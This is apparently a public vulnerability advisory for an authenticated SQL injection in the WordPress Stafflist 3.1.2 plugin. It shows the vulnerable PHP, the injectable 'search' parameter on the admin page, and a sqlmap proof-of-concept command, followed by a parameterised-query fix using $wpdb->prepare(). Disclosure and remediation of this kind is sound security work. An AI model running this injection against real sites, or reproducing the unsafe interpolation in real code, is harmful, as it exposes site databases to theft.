WordPress Stafflist 3.1.2 SQL Injection
WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

```php
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?...

$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : "");
```

# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib
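The vulnerable snippet above interpolates the raw `search` parameter straight into the `WHERE` clause. The following is an added example, not the plugin's own code, showing how the same search filter is built safely with WordPress's `$wpdb->prepare()` and `$wpdb->esc_like()`; the function name, the table name and the surrounding handler are assumed for illustration only.

```php
<?php
// Added example (not the stafflist plugin's code): the same LIKE-based
// search filter, built with parameterised SQL instead of string
// interpolation. Function and table names are hypothetical.

function stafflist_search_where_safe( $search ) {
    global $wpdb;

    $search = trim( (string) $search );
    if ( '' === $search ) {
        return '';
    }

    // esc_like() escapes '%' and '_' so user input cannot widen the LIKE
    // pattern; prepare() then quotes and escapes the value as an SQL string
    // literal, so quote characters in $search can no longer terminate the
    // literal and inject further SQL.
    $like = '%' . $wpdb->esc_like( strtolower( $search ) ) . '%';

    return $wpdb->prepare(
        'WHERE LOWER(lastname) LIKE %s OR LOWER(firstname) LIKE %s'
        . ' OR LOWER(department) LIKE %s OR LOWER(email) LIKE %s',
        $like,
        $like,
        $like,
        $like
    );
}

// Usage in the admin page handler (hypothetical table name):
// $where = stafflist_search_where_safe( isset( $_GET['search'] ) ? $_GET['search'] : '' );
// $rows  = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}stafflist {$where}" );
```

The important difference from the original code is that the user-controlled value never becomes part of the SQL text: it is passed as a `%s` argument to `prepare()`, which is the WordPress-native equivalent of a bound parameter. `esc_like()` is a separate concern (keeping `%` and `_` from acting as wildcards) and does not by itself prevent injection, which is why both calls are used together.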